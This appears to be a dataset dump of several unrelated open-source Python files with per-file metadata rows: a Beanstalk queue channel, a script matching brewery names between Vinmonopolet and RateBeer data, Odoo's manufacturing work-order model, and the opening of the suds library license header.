__author__ = "David Ziegler <david.ziegler@gmail.com>"
class Channel(virtual.Channel):
_client = None
def _parse_job(self, job):
item, dest = None, None
if job:
try:
item = loads(job.body)
dest = job.stats()["tube"]
except Exception:
job.bury()
else:
job.delete()
else:
raise Empty()
return item, dest
def _put(self, queue, message, **kwargs):
priority = message["properties"]["delivery_info"]["priority"]
self.client.use(queue)
self.client.put(dumps(message), priority=priority)
def _get(self, queue):
if queue not in self.client.watching():
self.client.watch(queue)
[self.client.ignore(active)
for active in self.client.watching()
if active != queue]
job = self.client.reserve(timeout=1)
item, dest = self._parse_job(job)
return item
def _get_many(self, queues, timeout=1):
# timeout of None will cause beanstalk to timeout waiting
# for a new request
if timeout is None:
timeout = 1
watching = self.client.watching()
[self.client.watch(active)
for active in queues
if active not in watching]
job = self.client.reserve(timeout=timeout)
return self._parse_job(job)
def _purge(self, queue):
if queue not in self.client.watching():
self.client.watch(queue)
[self.client.ignore(active)
for active in self.client.watching()
if active != queue]
count = 0
while 1:
job = self.client.reserve(timeout=1)
if job:
job.delete()
count += 1
else:
break
return count
def _size(self, queue):
return 0
def _open(self):
conninfo = self.connection.client
port = conninfo.port or DEFAULT_PORT
conn = Connection(host=conninfo.hostname, port=port)
conn.connect()
return conn
def close(self):
if self._client is not None:
return self._client.close()
super(Channel, self).close()
@property
def client(self):
if self._client is None:
self._client = self._open()
return self._client
class Transport(virtual.Transport):
Channel = Channel
polling_interval = 1
default_port = DEFAULT_PORT
connection_errors = (socket.error,
SocketError,
IOError)
channel_errors = (StdChannelError,
socket.error,
IOError,
SocketError,
BeanstalkcException)
|
mit
| 6,936,786,577,293,115,000
| 24.944882
| 69
| 0.553869
| false
| 4.240669
| false
| false
| false
|
atlefren/beerdatabase
|
breweryname_compare.py
|
1
|
1755
|
# -*- coding: utf-8 -*-
import json
from beertools import BreweryNameMatcher
def read_json(filename):
with open(filename, 'r') as infile:
return json.loads(infile.read())
def get_breweries_polet():
with open('data/polet.json', 'r') as infile:
data = json.loads(infile.read())
breweries = list(set([product['Produsent'] for product in data]))
return sorted(breweries), data
def get_breweries(beer_list, property_name):
return sorted(list(set([beer[property_name] for beer in beer_list])))
def get_breweries_ratebeer():
with open('data/ratebeer.json', 'r') as infile:
data = json.loads(infile.read())
breweries = list(set([product['brewery'] for product in data]))
return sorted(breweries)
def wrap_breweries(breweries):
return [{'id': index, 'name': brewery}
for index, brewery in enumerate(breweries)]
def compare_breweries(pol_data, breweries_rb):
breweries_pol = get_breweries(pol_data, 'Produsent')
# breweries_rb = wrap_breweries(get_breweries(rb_data, 'brewery'))
matcher = BreweryNameMatcher(breweries_rb)
with open('data/nomatch.txt', 'w') as nomatch:
with open('data/match.txt', 'w') as match_file:
for brewery in breweries_pol:
match = matcher.match_name(brewery)
if match is None:
nomatch.write(brewery.encode('utf8') + '\n')
else:
string = '%s: %s' % (brewery, match['name'])
match_file.write(string.encode('utf8') + '\n')
if __name__ == '__main__':
pol_data = read_json('data/polet.json')
rb_breweries = read_json('data/rb_breweries.json')
compare_breweries(pol_data, rb_breweries)
|
mit
| 8,518,859,701,575,844,000
| 30.909091
| 73
| 0.614815
| false
| 3.179348
| false
| false
| false
|
ddico/odoo
|
addons/mrp/models/mrp_workorder.py
|
1
|
39609
|
# -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
from datetime import datetime, timedelta
from dateutil.relativedelta import relativedelta
from collections import defaultdict
import json
from odoo import api, fields, models, _, SUPERUSER_ID
from odoo.exceptions import UserError
from odoo.tools import float_compare, float_round, format_datetime
class MrpWorkorder(models.Model):
_name = 'mrp.workorder'
_description = 'Work Order'
_inherit = ['mail.thread', 'mail.activity.mixin']
def _read_group_workcenter_id(self, workcenters, domain, order):
workcenter_ids = self.env.context.get('default_workcenter_id')
if not workcenter_ids:
workcenter_ids = workcenters._search([], order=order, access_rights_uid=SUPERUSER_ID)
return workcenters.browse(workcenter_ids)
name = fields.Char(
'Work Order', required=True,
states={'done': [('readonly', True)], 'cancel': [('readonly', True)]})
workcenter_id = fields.Many2one(
'mrp.workcenter', 'Work Center', required=True,
states={'done': [('readonly', True)], 'cancel': [('readonly', True)], 'progress': [('readonly', True)]},
group_expand='_read_group_workcenter_id', check_company=True)
working_state = fields.Selection(
string='Workcenter Status', related='workcenter_id.working_state', readonly=False,
help='Technical: used in views only')
product_id = fields.Many2one(related='production_id.product_id', readonly=True, store=True, check_company=True)
product_tracking = fields.Selection(related="product_id.tracking")
product_uom_id = fields.Many2one('uom.uom', 'Unit of Measure', required=True, readonly=True)
use_create_components_lots = fields.Boolean(related="production_id.picking_type_id.use_create_components_lots")
production_id = fields.Many2one('mrp.production', 'Manufacturing Order', required=True, check_company=True)
production_availability = fields.Selection(
string='Stock Availability', readonly=True,
related='production_id.reservation_state', store=True,
help='Technical: used in views and domains only.')
production_state = fields.Selection(
string='Production State', readonly=True,
related='production_id.state',
help='Technical: used in views only.')
production_bom_id = fields.Many2one('mrp.bom', related='production_id.bom_id')
qty_production = fields.Float('Original Production Quantity', readonly=True, related='production_id.product_qty')
company_id = fields.Many2one(related='production_id.company_id')
qty_producing = fields.Float(
compute='_compute_qty_producing', inverse='_set_qty_producing',
string='Currently Produced Quantity', digits='Product Unit of Measure')
qty_remaining = fields.Float('Quantity To Be Produced', compute='_compute_qty_remaining', digits='Product Unit of Measure')
qty_produced = fields.Float(
'Quantity', default=0.0,
readonly=True,
digits='Product Unit of Measure',
copy=False,
help="The number of products already handled by this work order")
is_produced = fields.Boolean(string="Has Been Produced",
compute='_compute_is_produced')
state = fields.Selection([
('pending', 'Waiting for another WO'),
('ready', 'Ready'),
('progress', 'In Progress'),
('done', 'Finished'),
('cancel', 'Cancelled')], string='Status',
default='pending', copy=False, readonly=True)
leave_id = fields.Many2one(
'resource.calendar.leaves',
help='Slot into workcenter calendar once planned',
check_company=True, copy=False)
date_planned_start = fields.Datetime(
'Scheduled Start Date',
compute='_compute_dates_planned',
inverse='_set_dates_planned',
states={'done': [('readonly', True)], 'cancel': [('readonly', True)]},
store=True, tracking=True, copy=False)
date_planned_finished = fields.Datetime(
'Scheduled End Date',
compute='_compute_dates_planned',
inverse='_set_dates_planned',
states={'done': [('readonly', True)], 'cancel': [('readonly', True)]},
store=True, tracking=True, copy=False)
date_start = fields.Datetime(
'Start Date', copy=False,
states={'done': [('readonly', True)], 'cancel': [('readonly', True)]})
date_finished = fields.Datetime(
'End Date', copy=False,
states={'done': [('readonly', True)], 'cancel': [('readonly', True)]})
duration_expected = fields.Float(
'Expected Duration', digits=(16, 2), default=60.0,
states={'done': [('readonly', True)], 'cancel': [('readonly', True)]},
help="Expected duration (in minutes)")
duration = fields.Float(
'Real Duration', compute='_compute_duration',
readonly=True, store=True)
duration_unit = fields.Float(
'Duration Per Unit', compute='_compute_duration',
readonly=True, store=True)
duration_percent = fields.Integer(
'Duration Deviation (%)', compute='_compute_duration',
group_operator="avg", readonly=True, store=True)
progress = fields.Float('Progress Done (%)', digits=(16, 2), compute='_compute_progress')
operation_id = fields.Many2one(
'mrp.routing.workcenter', 'Operation', check_company=True)
# Should be used differently as BoM can change in the meantime
worksheet = fields.Binary(
'Worksheet', related='operation_id.worksheet', readonly=True)
worksheet_type = fields.Selection(
string='Worksheet Type', related='operation_id.worksheet_type', readonly=True)
worksheet_google_slide = fields.Char(
'Worksheet URL', related='operation_id.worksheet_google_slide', readonly=True)
operation_note = fields.Text("Description", related='operation_id.note', readonly=True)
move_raw_ids = fields.One2many(
'stock.move', 'workorder_id', 'Raw Moves',
domain=[('raw_material_production_id', '!=', False), ('production_id', '=', False)])
move_finished_ids = fields.One2many(
'stock.move', 'workorder_id', 'Finished Moves',
domain=[('raw_material_production_id', '=', False), ('production_id', '!=', False)])
move_line_ids = fields.One2many(
'stock.move.line', 'workorder_id', 'Moves to Track',
help="Inventory moves for which you must scan a lot number at this work order")
finished_lot_id = fields.Many2one(
'stock.production.lot', string='Lot/Serial Number', compute='_compute_finished_lot_id',
inverse='_set_finished_lot_id', domain="[('product_id', '=', product_id), ('company_id', '=', company_id)]",
check_company=True)
time_ids = fields.One2many(
'mrp.workcenter.productivity', 'workorder_id', copy=False)
is_user_working = fields.Boolean(
'Is the Current User Working', compute='_compute_working_users',
help="Technical field indicating whether the current user is working. ")
working_user_ids = fields.One2many('res.users', string='Working user on this work order.', compute='_compute_working_users')
last_working_user_id = fields.One2many('res.users', string='Last user that worked on this work order.', compute='_compute_working_users')
next_work_order_id = fields.Many2one('mrp.workorder', "Next Work Order", check_company=True)
scrap_ids = fields.One2many('stock.scrap', 'workorder_id')
scrap_count = fields.Integer(compute='_compute_scrap_move_count', string='Scrap Move')
production_date = fields.Datetime('Production Date', related='production_id.date_planned_start', store=True, readonly=False)
json_popover = fields.Char('Popover Data JSON', compute='_compute_json_popover')
show_json_popover = fields.Boolean('Show Popover?', compute='_compute_json_popover')
consumption = fields.Selection([
('strict', 'Strict'),
('warning', 'Warning'),
('flexible', 'Flexible')],
required=True,
)
@api.depends('production_state', 'date_planned_start', 'date_planned_finished')
def _compute_json_popover(self):
previous_wo_data = self.env['mrp.workorder'].read_group(
[('next_work_order_id', 'in', self.ids)],
['ids:array_agg(id)', 'date_planned_start:max', 'date_planned_finished:max'],
['next_work_order_id'])
previous_wo_dict = dict([(x['next_work_order_id'][0], {
'id': x['ids'][0],
'date_planned_start': x['date_planned_start'],
'date_planned_finished': x['date_planned_finished']})
for x in previous_wo_data])
if self.ids:
conflicted_dict = self._get_conflicted_workorder_ids()
for wo in self:
infos = []
if not wo.date_planned_start or not wo.date_planned_finished or not wo.ids:
wo.show_json_popover = False
wo.json_popover = False
continue
if wo.state in ['pending', 'ready']:
previous_wo = previous_wo_dict.get(wo.id)
prev_start = previous_wo and previous_wo['date_planned_start'] or False
prev_finished = previous_wo and previous_wo['date_planned_finished'] or False
if wo.state == 'pending' and prev_start and not (prev_start > wo.date_planned_start):
infos.append({
'color': 'text-primary',
'msg': _("Waiting the previous work order, planned from %(start)s to %(end)s",
start=format_datetime(self.env, prev_start, dt_format=False),
end=format_datetime(self.env, prev_finished, dt_format=False))
})
if wo.date_planned_finished < fields.Datetime.now():
infos.append({
'color': 'text-warning',
'msg': _("The work order should have already been processed.")
})
if prev_start and prev_start > wo.date_planned_start:
infos.append({
'color': 'text-danger',
'msg': _("Scheduled before the previous work order, planned from %(start)s to %(end)s",
start=format_datetime(self.env, prev_start, dt_format=False),
end=format_datetime(self.env, prev_finished, dt_format=False))
})
if conflicted_dict.get(wo.id):
infos.append({
'color': 'text-danger',
'msg': _("Planned at the same time than other workorder(s) at %s", wo.workcenter_id.display_name)
})
color_icon = infos and infos[-1]['color'] or False
wo.show_json_popover = bool(color_icon)
wo.json_popover = json.dumps({
'infos': infos,
'color': color_icon,
'icon': 'fa-exclamation-triangle' if color_icon in ['text-warning', 'text-danger'] else 'fa-info-circle',
'replan': color_icon not in [False, 'text-primary']
})
@api.depends('production_id.lot_producing_id')
def _compute_finished_lot_id(self):
for workorder in self:
workorder.finished_lot_id = workorder.production_id.lot_producing_id
def _set_finished_lot_id(self):
for workorder in self:
workorder.production_id.lot_producing_id = workorder.finished_lot_id
@api.depends('production_id.qty_producing')
def _compute_qty_producing(self):
for workorder in self:
workorder.qty_producing = workorder.production_id.qty_producing
def _set_qty_producing(self):
for workorder in self:
workorder.production_id.qty_producing = workorder.qty_producing
workorder.production_id._set_qty_producing()
# Both `date_planned_start` and `date_planned_finished` are related fields on `leave_id`. Let's say
# we slide a workorder on a gantt view, a single call to write is made with both
# fields Changes. As the ORM doesn't batch the write on related fields and instead
# makes multiple call, the constraint check_dates() is raised.
# That's why the compute and set methods are needed. to ensure the dates are updated
# in the same time.
@api.depends('leave_id')
def _compute_dates_planned(self):
for workorder in self:
workorder.date_planned_start = workorder.leave_id.date_from
workorder.date_planned_finished = workorder.leave_id.date_to
def _set_dates_planned(self):
date_from = self[0].date_planned_start
date_to = self[0].date_planned_finished
self.mapped('leave_id').write({
'date_from': date_from,
'date_to': date_to,
})
def name_get(self):
res = []
for wo in self:
if len(wo.production_id.workorder_ids) == 1:
res.append((wo.id, "%s - %s - %s" % (wo.production_id.name, wo.product_id.name, wo.name)))
else:
res.append((wo.id, "%s - %s - %s - %s" % (wo.production_id.workorder_ids.ids.index(wo.id) + 1, wo.production_id.name, wo.product_id.name, wo.name)))
return res
def unlink(self):
# Removes references to workorder to avoid Validation Error
(self.mapped('move_raw_ids') | self.mapped('move_finished_ids')).write({'workorder_id': False})
self.mapped('leave_id').unlink()
mo_dirty = self.production_id.filtered(lambda mo: mo.state in ("confirmed", "progress", "to_close"))
res = super().unlink()
# We need to go through `_action_confirm` for all workorders of the current productions to
# make sure the links between them are correct (`next_work_order_id` could be obsolete now).
mo_dirty.workorder_ids._action_confirm()
return res
@api.depends('production_id.product_qty', 'qty_produced', 'production_id.product_uom_id')
def _compute_is_produced(self):
self.is_produced = False
for order in self.filtered(lambda p: p.production_id and p.production_id.product_uom_id):
rounding = order.production_id.product_uom_id.rounding
order.is_produced = float_compare(order.qty_produced, order.production_id.product_qty, precision_rounding=rounding) >= 0
@api.depends('time_ids.duration', 'qty_produced')
def _compute_duration(self):
for order in self:
order.duration = sum(order.time_ids.mapped('duration'))
order.duration_unit = round(order.duration / max(order.qty_produced, 1), 2) # rounding 2 because it is a time
if order.duration_expected:
order.duration_percent = 100 * (order.duration_expected - order.duration) / order.duration_expected
else:
order.duration_percent = 0
@api.depends('duration', 'duration_expected', 'state')
def _compute_progress(self):
for order in self:
if order.state == 'done':
order.progress = 100
elif order.duration_expected:
order.progress = order.duration * 100 / order.duration_expected
else:
order.progress = 0
def _compute_working_users(self):
""" Checks whether the current user is working, all the users currently working and the last user that worked. """
for order in self:
order.working_user_ids = [(4, order.id) for order in order.time_ids.filtered(lambda time: not time.date_end).sorted('date_start').mapped('user_id')]
if order.working_user_ids:
order.last_working_user_id = order.working_user_ids[-1]
elif order.time_ids:
order.last_working_user_id = order.time_ids.sorted('date_end')[-1].user_id
else:
order.last_working_user_id = False
if order.time_ids.filtered(lambda x: (x.user_id.id == self.env.user.id) and (not x.date_end) and (x.loss_type in ('productive', 'performance'))):
order.is_user_working = True
else:
order.is_user_working = False
def _compute_scrap_move_count(self):
data = self.env['stock.scrap'].read_group([('workorder_id', 'in', self.ids)], ['workorder_id'], ['workorder_id'])
count_data = dict((item['workorder_id'][0], item['workorder_id_count']) for item in data)
for workorder in self:
workorder.scrap_count = count_data.get(workorder.id, 0)
@api.onchange('date_planned_finished')
def _onchange_date_planned_finished(self):
if self.date_planned_start and self.date_planned_finished:
diff = self.date_planned_finished - self.date_planned_start
self.duration_expected = diff.total_seconds() / 60
@api.onchange('operation_id')
def _onchange_operation_id(self):
if self.operation_id:
self.name = self.operation_id.name
self.workcenter_id = self.operation_id.workcenter_id.id
@api.onchange('date_planned_start', 'duration_expected')
def _onchange_date_planned_start(self):
if self.date_planned_start and self.duration_expected:
self.date_planned_finished = self.date_planned_start + relativedelta(minutes=self.duration_expected)
@api.onchange('operation_id', 'workcenter_id', 'qty_production')
def _onchange_expected_duration(self):
self.duration_expected = self._get_duration_expected()
def write(self, values):
if 'production_id' in values:
raise UserError(_('You cannot link this work order to another manufacturing order.'))
if 'workcenter_id' in values:
for workorder in self:
if workorder.workcenter_id.id != values['workcenter_id']:
if workorder.state in ('progress', 'done', 'cancel'):
raise UserError(_('You cannot change the workcenter of a work order that is in progress or done.'))
workorder.leave_id.resource_id = self.env['mrp.workcenter'].browse(values['workcenter_id']).resource_id
if any(k not in ['time_ids', 'duration_expected', 'next_work_order_id'] for k in values.keys()) and any(workorder.state == 'done' for workorder in self):
raise UserError(_('You can not change the finished work order.'))
if 'date_planned_start' in values or 'date_planned_finished' in values:
for workorder in self:
start_date = fields.Datetime.to_datetime(values.get('date_planned_start')) or workorder.date_planned_start
end_date = fields.Datetime.to_datetime(values.get('date_planned_finished')) or workorder.date_planned_finished
if start_date and end_date and start_date > end_date:
raise UserError(_('The planned end date of the work order cannot be prior to the planned start date, please correct this to save the work order.'))
# Update MO dates if the start date of the first WO or the
# finished date of the last WO is update.
if workorder == workorder.production_id.workorder_ids[0] and 'date_planned_start' in values:
if values['date_planned_start']:
workorder.production_id.with_context(force_date=True).write({
'date_planned_start': fields.Datetime.to_datetime(values['date_planned_start'])
})
if workorder == workorder.production_id.workorder_ids[-1] and 'date_planned_finished' in values:
if values['date_planned_finished']:
workorder.production_id.with_context(force_date=True).write({
'date_planned_finished': fields.Datetime.to_datetime(values['date_planned_finished'])
})
return super(MrpWorkorder, self).write(values)
@api.model_create_multi
def create(self, values):
res = super().create(values)
# Auto-confirm manually added workorders.
# We need to go through `_action_confirm` for all workorders of the current productions to
# make sure the links between them are correct.
to_confirm = res.filtered(lambda wo: wo.production_id.state in ("confirmed", "progress", "to_close"))
to_confirm = to_confirm.production_id.workorder_ids
to_confirm._action_confirm()
return res
def _action_confirm(self):
workorders_by_production = defaultdict(lambda: self.env['mrp.workorder'])
for workorder in self:
workorders_by_production[workorder.production_id] |= workorder
for production, workorders in workorders_by_production.items():
workorders_by_bom = defaultdict(lambda: self.env['mrp.workorder'])
bom = self.env['mrp.bom']
moves = production.move_raw_ids | production.move_finished_ids
for workorder in self:
if workorder.operation_id.bom_id:
bom = workorder.operation_id.bom_id
if not bom:
bom = workorder.production_id.bom_id
previous_workorder = workorders_by_bom[bom][-1:]
previous_workorder.next_work_order_id = workorder.id
workorders_by_bom[bom] |= workorder
moves.filtered(lambda m: m.operation_id == workorder.operation_id).write({
'workorder_id': workorder.id
})
exploded_boms, dummy = production.bom_id.explode(production.product_id, 1, picking_type=production.bom_id.picking_type_id)
exploded_boms = {b[0]: b[1] for b in exploded_boms}
for move in moves:
if move.workorder_id:
continue
bom = move.bom_line_id.bom_id
while bom and bom not in workorders_by_bom:
bom_data = exploded_boms.get(bom, {})
bom = bom_data.get('parent_line') and bom_data['parent_line'].bom_id or False
if bom in workorders_by_bom:
move.write({
'workorder_id': workorders_by_bom[bom][-1:].id
})
else:
move.write({
'workorder_id': workorders_by_bom[production.bom_id][-1:].id
})
for workorders in workorders_by_bom.values():
if workorders[0].state == 'pending':
workorders[0].state = 'ready'
for workorder in workorders:
workorder._start_nextworkorder()
def _get_byproduct_move_to_update(self):
return self.production_id.move_finished_ids.filtered(lambda x: (x.product_id.id != self.production_id.product_id.id) and (x.state not in ('done', 'cancel')))
def _start_nextworkorder(self):
rounding = self.product_id.uom_id.rounding
if self.next_work_order_id.state == 'pending' and (
(self.operation_id.batch == 'no' and
float_compare(self.qty_production, self.qty_produced, precision_rounding=rounding) <= 0) or
(self.operation_id.batch == 'yes' and
float_compare(self.operation_id.batch_size, self.qty_produced, precision_rounding=rounding) <= 0)):
self.next_work_order_id.state = 'ready'
if self.state == 'done' and self.next_work_order_id.state == 'pending':
self.next_work_order_id.state = 'ready'
@api.model
def gantt_unavailability(self, start_date, end_date, scale, group_bys=None, rows=None):
"""Get unavailabilities data to display in the Gantt view."""
workcenter_ids = set()
def traverse_inplace(func, row, **kargs):
res = func(row, **kargs)
if res:
kargs.update(res)
for row in row.get('rows'):
traverse_inplace(func, row, **kargs)
def search_workcenter_ids(row):
if row.get('groupedBy') and row.get('groupedBy')[0] == 'workcenter_id' and row.get('resId'):
workcenter_ids.add(row.get('resId'))
for row in rows:
traverse_inplace(search_workcenter_ids, row)
start_datetime = fields.Datetime.to_datetime(start_date)
end_datetime = fields.Datetime.to_datetime(end_date)
workcenters = self.env['mrp.workcenter'].browse(workcenter_ids)
unavailability_mapping = workcenters._get_unavailability_intervals(start_datetime, end_datetime)
# Only notable interval (more than one case) is send to the front-end (avoid sending useless information)
cell_dt = (scale in ['day', 'week'] and timedelta(hours=1)) or (scale == 'month' and timedelta(days=1)) or timedelta(days=28)
def add_unavailability(row, workcenter_id=None):
if row.get('groupedBy') and row.get('groupedBy')[0] == 'workcenter_id' and row.get('resId'):
workcenter_id = row.get('resId')
if workcenter_id:
notable_intervals = filter(lambda interval: interval[1] - interval[0] >= cell_dt, unavailability_mapping[workcenter_id])
row['unavailabilities'] = [{'start': interval[0], 'stop': interval[1]} for interval in notable_intervals]
return {'workcenter_id': workcenter_id}
for row in rows:
traverse_inplace(add_unavailability, row)
return rows
def button_start(self):
self.ensure_one()
# As button_start is automatically called in the new view
if self.state in ('done', 'cancel'):
return True
if self.product_tracking == 'serial':
self.qty_producing = 1.0
# Need a loss in case of the real time exceeding the expected
timeline = self.env['mrp.workcenter.productivity']
if not self.duration_expected or self.duration < self.duration_expected:
loss_id = self.env['mrp.workcenter.productivity.loss'].search([('loss_type','=','productive')], limit=1)
if not len(loss_id):
raise UserError(_("You need to define at least one productivity loss in the category 'Productivity'. Create one from the Manufacturing app, menu: Configuration / Productivity Losses."))
else:
loss_id = self.env['mrp.workcenter.productivity.loss'].search([('loss_type','=','performance')], limit=1)
if not len(loss_id):
raise UserError(_("You need to define at least one productivity loss in the category 'Performance'. Create one from the Manufacturing app, menu: Configuration / Productivity Losses."))
if self.production_id.state != 'progress':
self.production_id.write({
'date_start': datetime.now(),
})
timeline.create({
'workorder_id': self.id,
'workcenter_id': self.workcenter_id.id,
'description': _('Time Tracking: ') + self.env.user.name,
'loss_id': loss_id[0].id,
'date_start': datetime.now(),
'user_id': self.env.user.id, # FIXME sle: can be inconsistent with company_id
'company_id': self.company_id.id,
})
if self.state == 'progress':
return True
start_date = datetime.now()
vals = {
'state': 'progress',
'date_start': start_date,
}
if not self.leave_id:
leave = self.env['resource.calendar.leaves'].create({
'name': self.display_name,
'calendar_id': self.workcenter_id.resource_calendar_id.id,
'date_from': start_date,
'date_to': start_date + relativedelta(minutes=self.duration_expected),
'resource_id': self.workcenter_id.resource_id.id,
'time_type': 'other'
})
vals['leave_id'] = leave.id
return self.write(vals)
else:
vals['date_planned_start'] = start_date
if self.date_planned_finished < start_date:
vals['date_planned_finished'] = start_date
return self.write(vals)
def button_finish(self):
end_date = datetime.now()
for workorder in self:
if workorder.state in ('done', 'cancel'):
continue
workorder.end_all()
vals = {
'state': 'done',
'date_finished': end_date,
'date_planned_finished': end_date
}
if not workorder.date_start:
vals['date_start'] = end_date
if not workorder.date_planned_start or end_date < workorder.date_planned_start:
vals['date_planned_start'] = end_date
workorder.write(vals)
workorder._start_nextworkorder()
return True
def end_previous(self, doall=False):
"""
@param: doall: This will close all open time lines on the open work orders when doall = True, otherwise
only the one of the current user
"""
# TDE CLEANME
timeline_obj = self.env['mrp.workcenter.productivity']
domain = [('workorder_id', 'in', self.ids), ('date_end', '=', False)]
if not doall:
domain.append(('user_id', '=', self.env.user.id))
not_productive_timelines = timeline_obj.browse()
for timeline in timeline_obj.search(domain, limit=None if doall else 1):
wo = timeline.workorder_id
if wo.duration_expected <= wo.duration:
if timeline.loss_type == 'productive':
not_productive_timelines += timeline
timeline.write({'date_end': fields.Datetime.now()})
else:
maxdate = fields.Datetime.from_string(timeline.date_start) + relativedelta(minutes=wo.duration_expected - wo.duration)
enddate = datetime.now()
if maxdate > enddate:
timeline.write({'date_end': enddate})
else:
timeline.write({'date_end': maxdate})
not_productive_timelines += timeline.copy({'date_start': maxdate, 'date_end': enddate})
if not_productive_timelines:
loss_id = self.env['mrp.workcenter.productivity.loss'].search([('loss_type', '=', 'performance')], limit=1)
if not len(loss_id):
raise UserError(_("You need to define at least one unactive productivity loss in the category 'Performance'. Create one from the Manufacturing app, menu: Configuration / Productivity Losses."))
not_productive_timelines.write({'loss_id': loss_id.id})
return True
def end_all(self):
return self.end_previous(doall=True)
def button_pending(self):
self.end_previous()
return True
def button_unblock(self):
for order in self:
order.workcenter_id.unblock()
return True
def action_cancel(self):
self.leave_id.unlink()
return self.write({'state': 'cancel'})
def action_replan(self):
"""Replan a work order.
It actually replans every "ready" or "pending"
work orders of the linked manufacturing orders.
"""
for production in self.production_id:
production._plan_workorders(replan=True)
return True
def button_done(self):
if any([x.state in ('done', 'cancel') for x in self]):
raise UserError(_('A Manufacturing Order is already done or cancelled.'))
self.end_all()
end_date = datetime.now()
return self.write({
'state': 'done',
'date_finished': end_date,
'date_planned_finished': end_date,
})
def button_scrap(self):
self.ensure_one()
return {
'name': _('Scrap'),
'view_mode': 'form',
'res_model': 'stock.scrap',
'view_id': self.env.ref('stock.stock_scrap_form_view2').id,
'type': 'ir.actions.act_window',
'context': {'default_company_id': self.production_id.company_id.id,
'default_workorder_id': self.id,
'default_production_id': self.production_id.id,
'product_ids': (self.production_id.move_raw_ids.filtered(lambda x: x.state not in ('done', 'cancel')) | self.production_id.move_finished_ids.filtered(lambda x: x.state == 'done')).mapped('product_id').ids},
'target': 'new',
}
def action_see_move_scrap(self):
self.ensure_one()
action = self.env.ref('stock.action_stock_scrap').read()[0]
action['domain'] = [('workorder_id', '=', self.id)]
return action
def action_open_wizard(self):
self.ensure_one()
action = self.env.ref('mrp.mrp_workorder_mrp_production_form').read()[0]
action['res_id'] = self.id
return action
@api.depends('qty_production', 'qty_produced')
def _compute_qty_remaining(self):
for wo in self:
wo.qty_remaining = float_round(wo.qty_production - wo.qty_produced, precision_rounding=wo.production_id.product_uom_id.rounding)
def _get_duration_expected(self, alternative_workcenter=False):
self.ensure_one()
if not self.workcenter_id:
return False
qty_production = self.production_id.product_uom_id._compute_quantity(self.qty_production, self.production_id.product_id.uom_id)
cycle_number = float_round(qty_production / self.workcenter_id.capacity, precision_digits=0, rounding_method='UP')
if alternative_workcenter:
# TODO : find a better alternative : the settings of workcenter can change
duration_expected_working = (self.duration_expected - self.workcenter_id.time_start - self.workcenter_id.time_stop) * self.workcenter_id.time_efficiency / (100.0 * cycle_number)
if duration_expected_working < 0:
duration_expected_working = 0
return alternative_workcenter.time_start + alternative_workcenter.time_stop + cycle_number * duration_expected_working * 100.0 / alternative_workcenter.time_efficiency
time_cycle = self.operation_id and self.operation_id.time_cycle or 60.0
return self.workcenter_id.time_start + self.workcenter_id.time_stop + cycle_number * time_cycle * 100.0 / self.workcenter_id.time_efficiency
def _get_conflicted_workorder_ids(self):
"""Get conlicted workorder(s) with self.
Conflict means having two workorders in the same time in the same workcenter.
:return: defaultdict with key as workorder id of self and value as related conflicted workorder
"""
self.flush(['state', 'date_planned_start', 'date_planned_finished', 'workcenter_id'])
sql = """
SELECT wo1.id, wo2.id
FROM mrp_workorder wo1, mrp_workorder wo2
WHERE
wo1.id IN %s
AND wo1.state IN ('pending','ready')
AND wo2.state IN ('pending','ready')
AND wo1.id != wo2.id
AND wo1.workcenter_id = wo2.workcenter_id
AND (DATE_TRUNC('second', wo2.date_planned_start), DATE_TRUNC('second', wo2.date_planned_finished))
OVERLAPS (DATE_TRUNC('second', wo1.date_planned_start), DATE_TRUNC('second', wo1.date_planned_finished))
"""
self.env.cr.execute(sql, [tuple(self.ids)])
res = defaultdict(list)
for wo1, wo2 in self.env.cr.fetchall():
res[wo1].append(wo2)
return res
@api.model
def _prepare_component_quantity(self, move, qty_producing):
""" helper that computes quantity to consume (or to create in case of byproduct)
depending on the quantity producing and the move's unit factor"""
if move.product_id.tracking == 'serial':
uom = move.product_id.uom_id
else:
uom = move.product_uom
return move.product_uom._compute_quantity(
qty_producing * move.unit_factor,
uom,
round=False
)
def _update_finished_move(self):
""" Update the finished move & move lines in order to set the finished
product lot on it as well as the produced quantity. This method get the
information either from the last workorder or from the Produce wizard."""
production_move = self.production_id.move_finished_ids.filtered(
lambda move: move.product_id == self.product_id and
move.state not in ('done', 'cancel')
)
if production_move and production_move.product_id.tracking != 'none':
if not self.finished_lot_id:
raise UserError(_('You need to provide a lot for the finished product.'))
move_line = production_move.move_line_ids.filtered(
lambda line: line.lot_id.id == self.finished_lot_id.id
)
if move_line:
if self.product_id.tracking == 'serial':
raise UserError(_('You cannot produce the same serial number twice.'))
move_line.product_uom_qty += self.qty_producing
move_line.qty_done += self.qty_producing
else:
location_dest_id = production_move.location_dest_id._get_putaway_strategy(self.product_id).id or production_move.location_dest_id.id
move_line.create({
'move_id': production_move.id,
'product_id': production_move.product_id.id,
'lot_id': self.finished_lot_id.id,
'product_uom_qty': self.qty_producing,
'product_uom_id': self.product_uom_id.id,
'qty_done': self.qty_producing,
'location_id': production_move.location_id.id,
'location_dest_id': location_dest_id,
})
else:
rounding = production_move.product_uom.rounding
production_move._set_quantity_done(
float_round(self.qty_producing, precision_rounding=rounding)
)
def _strict_consumption_check(self):
if self.consumption == 'strict':
for move in self.move_raw_ids:
qty_done = 0.0
for line in move.move_line_ids:
qty_done += line.product_uom_id._compute_quantity(line.qty_done, move.product_uom)
rounding = move.product_uom_id.rounding
if float_compare(qty_done, move.product_uom_qty, precision_rounding=rounding) != 0:
raise UserError(_('You should consume the quantity of %s defined in the BoM. If you want to consume more or less components, change the consumption setting on the BoM.', move.product_id.name))
def _check_sn_uniqueness(self):
""" Alert the user if the serial number as already been produced """
if self.product_tracking == 'serial' and self.finished_lot_id:
sml = self.env['stock.move.line'].search_count([
('lot_id', '=', self.finished_lot_id.id),
('location_id.usage', '=', 'production'),
('qty_done', '=', 1),
('state', '=', 'done')
])
if sml:
raise UserError(_('This serial number for product %s has already been produced', self.product_id.name))
|
agpl-3.0
| 3,872,464,057,137,297,000
| 50.708877
| 230
| 0.601883
| false
| 3.934148
| false
| false
| false
|
blakev/suds
|
suds/__init__.py
|
1
|
4404
|
# This program is free software; you can redistribute it and/or modify
# it under the terms of the (LGPL) GNU Lesser General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Library Lesser General Public License for more details at
